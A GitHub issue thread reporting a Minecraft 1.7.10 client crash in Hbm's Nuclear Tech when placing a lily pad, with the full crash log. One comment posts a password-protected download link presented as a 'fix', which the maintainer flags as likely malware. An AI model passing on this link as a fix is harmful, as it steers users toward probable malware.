### ISSUE TITLE
Crashing when places a lilypad in a server,the errors getting thrown out seem to be from hbm

### ISSUE THREAD

**Issue by hypnoshadow** [JameH2/Hbm-s-Nuclear-Tech-GIT#127]
### Describe the bug

Please describe the issue in as much detail as possible. Also mention the version of the mod you're running, if it's not the newest. In the case of a crash, please attach a crash log.
[crash-2024-08-29_03.25.51-client.txt](https://github.com/user-attachments/files/16795354/crash-2024-08-29_03.25.51-client.txt)

no clue whats doing it

---- Minecraft Crash Report ----
// Don't be sad, have a hug! <3

Time: 8/29/24 3:25 AM
Description: Unexpected error

java.lang.NullPointerException: Unexpected error
	at com.hbm.handler.atmosphere.ChunkAtmosphereHandler.getAtmosphere(ChunkAtmosphereHandler.java:63)
	at com.hbm.handler.atmosphere.ChunkAtmosphereHandler.getAtmosphere(ChunkAtmosphereHandler.java:48)
	at com.hbm.handler.atmosphere.ChunkAtmosphereHandler.runEffectsOnBlock(ChunkAtmosphereHandler.java:167)
	at com.hbm.handler.atmosphere.ChunkAtmosphereHandler.runEffectsOnBlock(ChunkAtmosphereHandler.java:195)
	at com.hbm.main.ModEventHandler.onBlockPlaced(ModEventHandler.java:533)
	at cpw.mods.fml.common.eventhandler.ASMEventHandler_286_ModEventHandler_onBlockPlaced_PlaceEvent.invoke(.dynamic)
	at cpw.mods.fml.common.eventhandler.ASMEventHandler.invoke(ASMEventHandler.java:54)
	at cpw.mods.fml.common.eventhandler.EventBus.post(EventBus.java:140)
	at net.minecraftforge.event.ForgeEventFactory.onPlayerBlockPlace(ForgeEventFactory.java:69)
	at net.minecraft.item.ItemLilyPad.func_77659_a(ItemLilyPad.java:52)
	at net.minecraft.item.ItemStack.func_77957_a(ItemStack.java:146)
	at net.minecraft.client.multiplayer.PlayerControllerMP.func_78769_a(PlayerControllerMP.java:377)
	at net.minecraft.client.Minecraft.func_147121_ag(Minecraft.java:1475)
	at net.minecraft.client.Minecraft.func_71407_l(Minecraft.java:1953)
	at net.minecraft.client.Minecraft.func_71411_J(Minecraft.java:973)
	at net.minecraft.client.Minecraft.func_99999_d(Minecraft.java:898)
	at net.minecraft.client.main.Main.main(SourceFile:148)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
	at java.lang.reflect.Method.invoke(Unknown Source)
	at net.minecraft.launchwrapper.Launch.launch(Launch.java:135)
	at net.minecraft.launchwrapper.Launch.main(Launch.java:28)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
	at java.lang.reflect.Method.invoke(Unknown Source)
	at org.polymc.impl.OneSixLauncher.invokeMain(OneSixLauncher.java:104)
	at org.polymc.impl.OneSixLauncher.launchWithMainClass(OneSixLauncher.java:176)
	at org.polymc.impl.OneSixLauncher.launch(OneSixLauncher.java:186)
	at org.polymc.EntryPoint.listen(EntryPoint.java:144)
	at org.polymc.EntryPoint.main(EntryPoint.java:74)

A detailed walkthrough of the error, its code path and all known details is as follows:
---------------------------------------------------------------------------------------

-- Head --
Stacktrace:
	at com.hbm.handler.atmosphere.ChunkAtmosphereHandler.getAtmosphere(ChunkAtmosphereHandler.java:63)
	at com.hbm.handler.atmosphere.ChunkAtmosphereHandler.getAtmosphere(ChunkAtmosphereHandler.java:48)
	at com.hbm.handler.atmosphere.ChunkAtmosphereHandler.runEffectsOnBlock(ChunkAtmosphereHandler.java:167)
	at com.hbm.handler.atmosphere.ChunkAtmosphereHandler.runEffectsOnBlock(ChunkAtmosphereHandler.java:195)
	at com.hbm.main.ModEventHandler.onBlockPlaced(ModEventHandler.java:533)
	at cpw.mods.fml.common.eventhandler.ASMEventHandler_286_ModEventHandler_onBlockPlaced_PlaceEvent.invoke(.dynamic)
	at cpw.mods.fml.common.eventhandler.ASMEventHandler.invoke(ASMEventHandler.java:54)
	at cpw.mods.fml.common.eventhandler.EventBus.post(EventBus.java:140)
	at net.minecraftforge.event.ForgeEventFactory.onPlayerBlockPlace(ForgeEventFactory.java:69)
	at net.minecraft.item.ItemLilyPad.func_77659_a(ItemLilyPad.java:52)
	at net.minecraft.item.ItemStack.func_77957_a(ItemStack.java:146)
	at net.minecraft.client.multiplayer.PlayerControllerMP.func_78769_a(PlayerControllerMP.java:377)
	at net.minecraft.client.Minecraft.func_147121_ag(Minecraft.java:1475)

-- Affected level --
Details:
	Level name: MpServer
	All players: 1 total; [EntityClientPlayerMP['hypnoshadow'/12973, l='MpServer', x=67.53, y=64.62, z=292.97]]
	Chunk stats: MultiplayerChunkCache: 441, 441
	Level seed: 0
	Level generator: ID 00 - default, ver 1. Features enabled: false
	Level generator options: 
	Level spawn location: World: (16,64,256), Chunk: (at 0,4,0 in 1,16; contains blocks 16,0,256 to 31,255,271), Region: (0,0; contains chunks 0,0 to 31,31, blocks 0,0,0 to 511,255,511)
	Level time: 245181 game time, 194576 day time
	Level dimension: 0
	Level storage version: 0x00000 - Unknown?
	Level weather: Rain time: 0 (now: false), thunder time: 0 (now: false)
	Level game mode: Game mode: survival (ID 0). Hardcore: false. Cheats: false
	Forced entities: 119 total; [EntityItem['item.item.witchery:seedsartichoke'/11268, l='MpServer', x=94.19, y=64.13, z=283.19], EntityHorse['Horse'/260, l='MpServer', x=93.25, y=64.00, z=242.00], EntityHorse['Horse'/261, l='MpServer', x=113.78, y=64.00, z=273.50], EntityHorse['Horse'/262, l='MpServer', x=116.91, y=64.00, z=264.66], EntityHorse['Horse'/263, l='MpServer', x=106.94, y=64.00, z=263.00], EntityChicken['Chicken'/264, l='MpServer', x=108.53, y=62.51, z=291.16], EntityChicken['Chicken'/265, l='MpServer', x=110.53, y=62.39, z=296.16], EntityChicken['Chicken'/267, l='MpServer', x=111.47, y=66.00, z=312.47], EntityClientPlayerMP['hypnoshadow'/12973, l='MpServer', x=67.53, y=64.62, z=292.97], EntityItem['item.item.egg'/12304, l='MpServer', x=122.31, y=68.13, z=312.91], EntityCreeperPhosgene['Phosgene Creeper'/9492, l='MpServer', x=85.03, y=40.00, z=265.44], EntityManaCreeper['Mana Creeper'/11028, l='MpServer', x=122.50, y=38.00, z=269.50], EntityManaCreeper['Mana Creeper'/11029, l='MpServer', x=122.50, y=38.00, z=268.50], EntityChicken['Chicken'/277, l='MpServer', x=113.53, y=67.00, z=214.56], EntityManaCreeper['Mana Creeper'/11031, l='MpServer', x=125.41, y=38.00, z=269.00], EntityZombie['Zombie'/12567, l='MpServer', x=112.09, y=29.00, z=370.25], EntityZombie['Zombie'/11289, l='MpServer', x=125.44, y=37.00, z=358.91], EntityZombie['Zombie'/11290, l='MpServer', x=124.50, y=37.00, z=355.50], EntityChicken['Chicken'/283, l='MpServer', x=119.41, y=55.00, z=245.53], EntityCreeper['Creeper'/10783, l='MpServer', x=87.50, y=13.00, z=284.50], EntitySkeleton['Skeleton'/10527, l='MpServer', x=108.50, y=39.00, z=265.50], EntityChicken['Chicken'/293, l='MpServer', x=123.34, y=68.00, z=313.41], EntityChicken['Chicken'/294, l='MpServer', x=121.59, y=68.00, z=316.53], EntityCreeperPhosgene['Phosgene Creeper'/10791, l='MpServer', x=81.97, y=34.00, z=254.72], EntityChicken['Chicken'/295, l='MpServer', x=128.44, y=68.00, z=315.44], EntityItem['item.item.feather'/11566, l='MpServer', x=126.78, y=66.13, z=332.66], EntityCreeper['Creeper'/9776, l='MpServer', x=53.75, y=46.00, z=265.91], VengefulGolem['Vengeful Golem'/5424, l='MpServer', x=54.50, y=54.00, z=245.50], EntityChicken['Chicken'/312, l='MpServer', x=138.59, y=62.36, z=220.56], EntityZombie['Zombie'/9021, l='MpServer', x=117.50, y=26.00, z=322.50], EntitySheep['Sheep'/317, l='MpServer', x=141.19, y=61.00, z=269.63], EntitySheep['Sheep'/318, l='MpServer', x=139.88, y=66.00, z=271.19], EntityChicken['Chicken'/319, l='MpServer', x=137.59, y=66.00, z=296.53], EntityChicken['Chicken'/321, l='MpServer', x=141.47, y=69.00, z=321.84], EntityChicken['Chicken'/322, l='MpServer', x=124.56, y=66.00, z=332.44], EntityBat['Bat'/12866, l='MpServer', x=77.17, y=39.72, z=253.42], EntityCreeper['Creeper'/10313, l='MpServer', x=120.41, y=43.00, z=263.78], EntityItem['item.item.egg'/12364, l='MpServer', x=125.84, y=66.13, z=332.66], EntityItem['item.item.feather'/10576, l='MpServer', x=24.06, y=64.13, z=257.47], EntitySkeleton['Skeleton'/12630, l='MpServer', x=135.50, y=23.00, z=331.50], EntityBrainyZombie['Angry Zombie'/12886, l='MpServer', x=74.13, y=22.00, z=232.50], MadThaumaturge['Mad Thaumaturge'/11607, l='MpServer', x=43.50, y=38.00, z=276.50], EntityZombie['Zombie'/12631, l='MpServer', x=135.50, y=23.00, z=329.50], EntityEnderman['Enderman'/12887, l='MpServer', x=-13.00, y=38.00, z=364.03], EntitySkeleton['Skeleton'/11608, l='MpServer', x=43.50, y=38.00, z=275.50], EntityZombie['Zombie'/12632, l='MpServer', x=140.50, y=23.00, z=333.50], EntitySkeleton['Skeleton'/11609, l='MpServer', x=44.50, y=38.00, z=274.50], EntityChicken['Chicken'/345, l='MpServer', x=137.53, y=65.00, z=288.56], EntityItem['item.item.feather'/7003, l='MpServer', x=117.13, y=50.13, z=244.81], EntityBat['Bat'/5477, l='MpServer', x=102.75, y=32.00, z=340.75], EntityBat['Bat'/11623, l='MpServer', x=42.75, y=33.10, z=267.84], EntityCreeper['Creeper'/10862, l='MpServer', x=45.94, y=47.00, z=254.72], EntitySpider['Spider'/11380, l='MpServer', x=65.34, y=67.00, z=366.59], EntitySkeleton['Skeleton'/11894, l='MpServer', x=87.50, y=14.00, z=279.50], EntitySkeleton['Skeleton'/11895, l='MpServer', x=86.63, y=14.00, z=278.00], EntitySkeleton['Skeleton'/11897, l='MpServer', x=83.34, y=15.00, z=267.84], EntitySkeleton['Skeleton'/11386, l='MpServer', x=130.50, y=49.00, z=256.50], EntitySkeleton['Skeleton'/12675, l='MpServer', x=110.94, y=42.00, z=256.47], EntityCreeper['Creeper'/12676, l='MpServer', x=114.50, y=42.00, z=244.50], EntitySkeleton['Skeleton'/10116, l='MpServer', x=132.50, y=40.00, z=269.50], EntitySkeleton['Skeleton'/10117, l='MpServer', x=120.56, y=38.00, z=261.94], EntityCreeper['Creeper'/12677, l='MpServer', x=113.50, y=42.00, z=245.50], EntityBat['Bat'/11653, l='MpServer', x=36.44, y=41.71, z=239.51], EntityBat['Bat'/11655, l='MpServer', x=65.50, y=42.57, z=239.39], EntityBat['Bat'/11657, l='MpServer', x=73.21, y=39.07, z=247.67], EntityZombie['Zombie'/11913, l='MpServer', x=131.88, y=30.00, z=251.75], EntityHorse['Horse'/139, l='MpServer', x=-1.56, y=67.13, z=368.19], EntityPig['Pig'/140, l='MpServer', x=8.03, y=63.00, z=270.97], EntityHorse['Horse'/141, l='MpServer', x=18.97, y=66.00, z=349.81], EntityItem['item.item.string'/10642, l='MpServer', x=67.19, y=18.13, z=266.84], EntityCreeper['Creeper'/12178, l='MpServer', x=125.50, y=69.00, z=286.50], EntityPig['Pig'/149, l='MpServer', x=16.50, y=63.00, z=225.75], EntityHorse['Horse'/150, l='MpServer', x=18.19, y=64.00, z=232.53], EntityCreeper['Creeper'/12183, l='MpServer', x=101.94, y=65.00, z=318.25], EntitySkeleton['Skeleton'/11671, l='MpServer', x=122.75, y=20.00, z=262.69], EntityChicken['Chicken'/152, l='MpServer', x=22.63, y=64.00, z=257.44], EntitySkeleton['Skeleton'/12441, l='MpServer', x=-0.50, y=32.00, z=342.50], EntityCreeper['Creeper'/12442, l='MpServer', x=108.50, y=33.00, z=350.50], EntityZombie['Zombie'/12188, l='MpServer', x=124.50, y=37.00, z=242.94], EntityItem['item.item.seeds'/11165, l='MpServer', x=100.72, y=64.13, z=279.78], EntityZombie['Zombie'/11681, l='MpServer', x=45.59, y=63.00, z=264.91], EntityItem['item.item.rottenFlesh'/12964, l='MpServer', x=54.78, y=63.13, z=265.69], EntityPig['Pig'/169, l='MpServer', x=44.84, y=65.00, z=234.69], EntityHorse['Horse'/170, l='MpServer', x=38.44, y=65.00, z=234.72], EntityItem['item.item.egg'/12972, l='MpServer', x=25.03, y=64.13, z=257.91], EntityZombie['Zombie'/174, l='MpServer', x=38.70, y=34.35, z=256.57], EntityChicken['Chicken'/175, l='MpServer', x=38.69, y=34.00, z=256.47], EntityItem['item.item.egg'/10927, l='MpServer', x=123.75, y=68.13, z=313.69], EntitySheep['Sheep'/12980, l='MpServer', x=146.47, y=61.00, z=270.34], EntityCreeper['Creeper'/12725, l='MpServer', x=-1.50, y=22.00, z=336.50], EntityItem['item.item.bone'/12214, l='MpServer', x=86.94, y=14.13, z=279.03], EntityZombie['Zombie'/12727, l='MpServer', x=-5.47, y=22.00, z=336.44], EntitySkeleton['Skeleton'/12986, l='MpServer', x=145.41, y=43.00, z=255.91], EntityZombie['Zombie'/10944, l='MpServer', x=100.50, y=50.00, z=247.50], EntitySkeleton['Skeleton'/10946, l='MpServer', x=101.50, y=50.00, z=246.50], EntityPig['Pig'/199, l='MpServer', x=55.34, y=68.00, z=221.47], EntityHorse['Horse'/204, l='MpServer', x=54.25, y=67.00, z=225.97], EntityChicken['Chicken'/205, l='MpServer', x=60.59, y=65.00, z=228.44], EntityChicken['Chicken'/206, l='MpServer', x=49.53, y=68.00, z=225.47], EntityXPOrb['Experience Orb'/13007, l='MpServer', x=162.75, y=60.25, z=243.25], EntityPig['Pig'/207, l='MpServer', x=65.59, y=65.00, z=225.38], EntitySkeleton['Skeleton'/13263, l='MpServer', x=83.50, y=14.00, z=279.50], EntitySkeleton['Skeleton'/13264, l='MpServer', x=82.50, y=14.00, z=281.50], EntityChicken['Chicken'/209, l='MpServer', x=50.53, y=64.00, z=247.53], EntityItem['item.item.egg'/11986, l='MpServer', x=117.81, y=54.13, z=245.88], EntityItem['item.item.egg'/10207, l='MpServer', x=108.75, y=62.13, z=291.13], EntityBat['Bat'/12256, l='MpServer', x=122.75, y=29.64, z=316.25], EntityPig['Pig'/227, l='MpServer', x=63.72, y=66.00, z=224.19], EntitySheep['Sheep'/228, l='MpServer', x=84.06, y=64.00, z=244.09], EntityBat['Bat'/12265, l='MpServer', x=111.16, y=40.76, z=334.44], EntityBat['Bat'/9962, l='MpServer', x=120.35, y=42.00, z=271.33], EntityItem['item.item.egg'/10987, l='MpServer', x=110.09, y=66.13, z=312.56], EntityBat['Bat'/12268, l='MpServer', x=108.13, y=36.00, z=353.25], EntitySpider['Spider'/5869, l='MpServer', x=69.91, y=57.00, z=247.22], EntityItem['item.item.feather'/4845, l='MpServer', x=117.13, y=54.13, z=245.88], EntityBat['Bat'/12269, l='MpServer', x=113.53, y=36.00, z=358.63], EntityHorse['Horse'/239, l='MpServer', x=73.44, y=63.00, z=315.63], EntityBat['Bat'/12271, l='MpServer', x=112.91, y=27.73, z=313.94], EntitySkeleton['Skeleton'/11513, l='MpServer', x=130.50, y=61.00, z=359.50]]
	Retry entities: 0 total; []
	Server brand: fml,forge
	Server type: Non-integrated multiplayer server
Stacktrace:
	at net.minecraft.client.multiplayer.WorldClient.func_72914_a(WorldClient.java:373)
	at net.minecraft.client.Minecraft.func_71396_d(Minecraft.java:2444)
	at net.minecraft.client.Minecraft.func_99999_d(Minecraft.java:927)
	at net.minecraft.client.main.Main.main(SourceFile:148)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
	at java.lang.reflect.Method.invoke(Unknown Source)
	at net.minecraft.launchwrapper.Launch.launch(Launch.java:135)
	at net.minecraft.launchwrapper.Launch.main(Launch.java:28)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
	at java.lang.reflect.Method.invoke(Unknown Source)
	at org.polymc.impl.OneSixLauncher.invokeMain(OneSixLauncher.java:104)
	at org.polymc.impl.OneSixLauncher.launchWithMainClass(OneSixLauncher.java:176)
	at org.polymc.impl.OneSixLauncher.launch(OneSixLauncher.java:186)
	at org.polymc.EntryPoint.listen(EntryPoint.java:144)
	at org.polymc.EntryPoint.main(EntryPoint.java:74)

-- System Details --
Details:
	Minecraft Version: 1.7.10
	Operating System: Windows 11 (amd64) version 10.0
	Java Version: 1.8.0_411, Oracle Corporation
	Java VM Version: Java HotSpot(TM) 64-Bit Server VM (mixed mode), Oracle Corporation
	Memory: 1444683336 bytes (1377 MB) / 4081582080 bytes (3892 MB) up to 9902751744 bytes (9444 MB)
	JVM Flags: 3 total; -XX:HeapDumpPath=MojangTricksIntelDriversForPerformance_javaw.exe_minecraft.exe.heapdump -Xms512m -Xmx10624m
	AABB Pool Size: 0 (0 bytes; 0 MB) allocated, 0 (0 bytes; 0 MB) used
	IntCache: cache: 0, tcache: 0, allocated: 13, tallocated: 95
	FML: MCP v9.05 FML v7.10.99.99 Minecraft Forge 10.13.4.1614 78 mods loaded, 78 mods active
	States: 'U' = Unloaded 'L' = Loaded 'C' = Constructed 'H' = Pre-initialized 'I' = Initialized 'J' = Post-initialized 'A' = Available 'D' = Disabled 'E' = Errored
	UCHIJA	mcp{9.05} [Minecraft Coder Pack] (minecraft.jar) 
	UCHIJA	FML{7.10.99.99} [Forge Mod Loader] (forge-1.7.10-10.13.4.1614-1.7.10-universal.jar) 
	UCHIJA	Forge{10.13.4.1614} [Minecraft Forge] (forge-1.7.10-10.13.4.1614-1.7.10-universal.jar) 
	UCHIJA	appliedenergistics2-core{rv3-beta-6} [Applied Energistics 2 Core] (minecraft.jar) 
	UCHIJA	CodeChickenCore{1.3.6} [CodeChicken Core] (minecraft.jar) 
	UCHIJA	NotEnoughItems{2.6.28-GTNH-pre} [NotEnoughItems] (NotEnoughItems-2.6.28-GTNH-pre.jar) 
	UCHIJA	ThE-core{1.0.0.1} [Thaumic Energistics Core] (minecraft.jar) 
	UCHIJA	ThaumicTinkerer-preloader{0.1} [Thaumic Tinkerer Core] (minecraft.jar) 
	UCHIJA	WitchingGadgetsCore{1.1.10} [Witching Gadgets Core] (minecraft.jar) 
	UCHIJA	OpenModsCore{0.10.1} [OpenModsCore] (minecraft.jar) 
	UCHIJA	<CoFH ASM>{000} [CoFH ASM] (minecraft.jar) 
	UCHIJA	particlelib{1} [Particle Library] (ParticleLib - 1.jar) 
	UCHIJA	Baubles{1.0.1.10} [Baubles] (Baubles-1.7.10-1.0.1.10.jar) 
	UCHIJA	Thaumcraft{4.2.3.5} [Thaumcraft] (Thaumcraft-1.7.10-4.2.3.5.jar) 
	UCHIJA	CoFHCore{1.7.10R3.1.4} [CoFH Core] (CoFHCore-[1.7.10]3.1.4-329.jar) 
	UCHIJA	thaumicadditions{0.41} [Thaumic Additions] ([1.7.10] Thaumic Additions - 0.41.jar) 
	UCHIJA	AnimationAPI{1.2.4} [AnimationAPI] (AnimationAPI-1.7.10-1.2.4.jar) 
	UCHIJA	arsmagica2{1.6.7} [Ars Magica 2] (AM2.5-LTS-1.6.7.jar) 
	UCHIJA	appliedenergistics2{rv3-beta-6} [Applied Energistics 2] (appliedenergistics2-rv3-beta-6.jar) 
	UCHIJA	Waila{1.5.10} [Waila] (Waila-1.5.10_1.7.10.jar) 
	UCHIJA	Automagy{0.28.2} [Automagy] (Automagy-1.7.10-0.28.2.jar) 
	UCHIJA	betterbuilderswands{0.8.1} [Better Builder's Wands] (BetterBuildersWands-0.8.1-1.7.10r92+aec06c3.jar) 
	UCHIJA	AWWayofTime{v1.3.3} [Blood Magic: Alchemical Wizardry] (BloodMagic-1.7.10-1.3.3-17.jar) 
	UCHIJA	Botania{r1.8-249} [Botania] (Botania r1.8-249.jar) 
	UCHIJA	CarpentersBlocks{3.3.8.2} [Carpenter's Blocks] (Carpenter's Blocks v3.3.8.2 - MC 1.7.10.jar) 
	UCHIJA	cookingbook{1.0.140} [Cooking for Blockheads] (cookingbook-mc1.7.10-1.0.140.jar) 
	UCHIJA	MineTweaker3{3.1.0} [MineTweaker 3] (CraftTweaker-1.7.10-3.1.0-legacy.jar) 
	UCHIJA	witchery{0.24.1} [Witchery] (witchery-1.7.10-0.24.1.jar) 
	UCHIJA	dh{1.0} [Deathly Hallows] (deathlyhallows-1.0.22.jar) 
	UCHIJA	ImmibisCore{59.1.4} [Immibis Core] (immibis-core-59.1.4.jar) 
	UCHIJA	DimensionalAnchors{59.0.3} [Dimensional Anchors] (dimensional-anchor-59.0.3.jar) 
	UCHIJA	DummyCore{1.13} [DummyCore] (DummyCore1.13.jar) 
	UCHIJA	ExtraUtilities{1.2.12} [Extra Utilities] (extrautilities-1.2.12.jar) 
	UCHIJA	fastleafdecay{1.4} [Fast Leaf Decay] (FastLeafDecay-1.7.10-1.4.jar) 
	UCHIJA	FlatBedrockx{1.0.2} [FlatBedrock Xplosion's Edition] (FlatBedrock-1.0.2.jar) 
	UCHIJA	ThaumicTinkerer{unspecified} [Thaumic Tinkerer] (ThaumicTinkerer-2.5-1.7.10-164.jar) 
	UCHIJA	ForbiddenMagic{1.7.10-0.575} [Forbidden Magic] (Forbidden Magic-1.7.10-0.575.jar) 
	UCHIJA	ForgottenRelics{1.7.3} [Forgotten Relics] (ForgottenRelics-1.7.3-[Final].jar) 
	UCHIJA	gadomancy{1.0.7.3} [Gadomancy] (gadomancy-1.7.10-1.0.7.3.jar) 
	UCHIJA	gud_thaumicnei{1.3.0} [Thaumic NEI] (gud_thaumicnei-1.3.0.jar) 
	UCHIJA	hbm{1.0.27 BETA (5064)} [Hbm's Nuclear Tech] (HBM-NTM-.1.0.27_X5064.jar) 
	UCHIJA	inventorytweaks{1.59-dev-152-cf6e263} [Inventory Tweaks] (InventoryTweaks-1.59-dev-152.jar) 
	UCHIJA	IronChest{6.0.62.742} [Iron Chest] (ironchest-1.7.10-6.0.62.742-universal.jar) 
	UCHIJA	harvestcraft{1.7.10j} [Pam's HarvestCraft] (Pam's HarvestCraft 1.7.10Lb.jar) 
	UCHIJA	jaffa{1.91.56} [JAFFA (HarvestCraft Addon)] (JAFFA-1.91.56.jar) 
	UCHIJA	journeymap{5.2.3} [JourneyMap] (journeymap-1.7.10-5.2.3-unlimited.jar) 
	UCHIJA	MagicCookie{1.0.7.1} [Magic Cookies, something yummy] (MagicCookies-1.0.7.1.jar) 
	UCHIJA	Mantle{1.7.10-0.3.2.jenkins191} [Mantle] (Mantle-1.7.10-0.3.2b.jar) 
	UCHIJA	MTRM{1.0} [MineTweakerRecipeMaker] (MineTweakerRecipeMaker-1.7.10-1.1.1.jar) 
	UCHIJA	numina{1.7.10} [Numina] (Numina-0.4.1.106.jar) 
	UCHIJA	p455w0rdslib{1.0.4} [p455w0rd's Library] (p455w0rdslib-1.7.10-1.0.4.jar) 
	UCHIJA	ae2wct{1.7.10-rv3-1.8.7.4b} [AE2 Wireless Crafting Terminal] (WirelessCraftingTerminal-1.7.10-rv3-1.8.7.4b.jar) 
	UCHIJA	powersuits{1.7.10-0.11.1.117} [MachineMuse's Modular Powersuits] (ModularPowersuits-1.7.10-0.11.1.117.jar) 
	UCHIJA	MouseTweaks{2.4.4} [Mouse Tweaks] (MouseTweaks-2.4.4-mc1.7.10.jar) 
	UCHIJA	cfm{3.4.7} [ 9MrCrayfish's Furniture Mod] (MrCrayfishFurnitureModv3.4.7(1.7.10).jar) 
	UCHIJA	NEIAddons{1.12.14.40} [NEI Addons] (neiaddons-1.12.14.40-mc1.7.10.jar) 
	UCHIJA	NEIAddons|Developer{1.12.14.40} [NEI Addons: Developer Tools] (neiaddons-1.12.14.40-mc1.7.10.jar) 
	UCHIJA	NEIAddons|AppEng{1.12.14.40} [NEI Addons: Applied Energistics 2] (neiaddons-1.12.14.40-mc1.7.10.jar) 
	UCHIJA	NEIAddons|Botany{1.12.14.40} [NEI Addons: Botany] (neiaddons-1.12.14.40-mc1.7.10.jar) 
	UCHIJA	NEIAddons|Forestry{1.12.14.40} [NEI Addons: Forestry] (neiaddons-1.12.14.40-mc1.7.10.jar) 
	UCHIJA	NEIAddons|CraftingTables{1.12.14.40} [NEI Addons: Crafting Tables] (neiaddons-1.12.14.40-mc1.7.10.jar) 
	UCHIJA	NEIAddons|ExNihilo{1.12.14.40} [NEI Addons: Ex Nihilo] (neiaddons-1.12.14.40-mc1.7.10.jar) 
	UCHIJA	neirecipehandlers{1.1.0-BETA} [NEI Recipe Handlers] (neiRecipeHandlers-1.1.0-BETA.jar) 
	UCHIJA	no_fog{1.0.0} [NoFog] (NoFog-1.7.10b1-1.0.jar) 
	UCHIJA	recipehandler{1.7.10} [NoMoreRecipeConflict] (NoMoreRecipeConflict-1.7.10-0.3.2.jar) 
	UCHIJA	OpenMods{0.10.1} [OpenMods] (OpenModsLib-1.7.10-0.10.1.jar) 
	UCHIJA	OpenBlocks{1.6} [OpenBlocks] (OpenBlocks-1.7.10-1.6.jar) 
	UCHIJA	TaintedMagic{8.1.1} [Tainted Magic] (Tainted-Magic-1.7.10-8.1.1.jar) 
	UCHIJA	TConstruct{1.7.10-1.8.8.build988} [Tinkers' Construct] (TConstruct-1.7.10-1.8.8.jar) 
	UCHIJA	thaumicbases{1.3.1710.2} [Thaumic Bases] (ThaumicBases-1.3.1710.4.jar) 
	UCHIJA	ThaumicHorizons{1.5.4} [ThaumicHorizons] (ThaumicHorizons-1.5.4.jar) 
	UCHIJA	ThaumicConcilium{1.0.8} [Thaumic Concilium] (ThaumicConcilium-1.0.8.jar) 
	UCHIJA	thaumicenergistics{1.1.3.0} [Thaumic Energistics] (thaumicenergistics-1.1.3.0.jar) 
	UCHIJA	TravellersGear{1.16.6} [Traveller's Gear] (TravellersGear-1.7.10-1.16.6.jar) 
	UCHIJA	wailafeatures{0.1.0} [WAILA Features] (WAILA-features-1.7.10-0.1.0.jar) 
	UCHIJA	WailaHarvestability{1.1.6} [Waila Harvestability] (WailaHarvestability-mc1.7.10-1.1.6.jar) 
	UCHIJA	WitchingGadgets{1.1.10} [Witching Gadgets] (WitchingGadgets-1.7.10-1.1.10.jar) 
	UCHIJA	IguanaTweaksTConstruct{1.7.10-2.1.6.163} [Iguana Tinker Tweaks] (IguanaTinkerTweaks-1.7.10-2.1.6.jar) 
	GL info: ' Vendor: 'NVIDIA Corporation' Version: '4.6.0 NVIDIA 537.70' Renderer: 'NVIDIA GeForce RTX 3060/PCIe/SSE2'
	OpenModsLib class transformers: [stencil_patches:FINISHED],[movement_callback:FINISHED],[player_damage_hook:FINISHED],[map_gen_fix:FINISHED],[gl_capabilities_hook:FINISHED],[player_render_hook:FINISHED]
	Class transformer null safety: found misbehaving transformers: me.guichaguri.betterfps.transformers.MathTransformer(me.guichaguri.betterfps.transformers.MathTransformer@5c85848d) returned non-null result: 0,me.guichaguri.betterfps.transformers.EventTransformer(me.guichaguri.betterfps.transformers.EventTransformer@1d2ce516) returned non-null result: 0
	CoFHCore: -[1.7.10]3.1.4-329
	AE2 Version: beta rv3-beta-6 for Forge 10.13.4.1448
	Mantle Environment: Environment healthy.
	TConstruct Environment: Environment healthy.
	Stencil buffer state: Function set: GL30, pool: forge, bits: 8
	AE2 Integration: IC2:OFF, RotaryCraft:OFF, RC:OFF, BuildCraftCore:OFF, BuildCraftTransport:OFF, BuildCraftBuilder:OFF, RF:ON, RFItem:ON, MFR:OFF, DSU:ON, FZ:OFF, FMP:OFF, RB:OFF, CLApi:OFF, Waila:ON, InvTweaks:ON, NEI:ON, CraftGuide:OFF, Mekanism:OFF, ImmibisMicroblocks:OFF, BetterStorage:OFF, OpenComputers:OFF, PneumaticCraft:OFF
	NEI Recipe Handlers modules: : NEI Recipe Handlers (1.1.0-BETA); 
	Launched Version: 1.7.10
	LWJGL: 2.9.4
	OpenGL: NVIDIA GeForce RTX 3060/PCIe/SSE2 GL version 4.6.0 NVIDIA 537.70, NVIDIA Corporation
	GL Caps: Using GL 1.3 multitexturing.
Using framebuffer objects because OpenGL 3.0 is supported and separate blending is supported.
Anisotropic filtering is supported and maximum anisotropy is 16.
Shaders are available because OpenGL 2.1 is supported.

	Is Modded: Definitely; Client brand changed to 'fml,forge'
	Type: Client (map_client.txt)
	Resource Packs: []
	Current Language: English (US)
	Profiler Position: N/A (disabled)
	Vec3 Pool Size: 0 (0 bytes; 0 MB) allocated, 0 (0 bytes; 0 MB) used
	Anisotropic Filtering: Off (1)

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MellowArpeggiation** [comment]
> Download https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file password: changeme In the installer menu, select "gcc."

DO NOT DO THIS, we are not affiliated with whoever the fuck this is, it's highly likely to be malware.

**Comment by MellowArpeggiation** [comment]
Fixed in next update
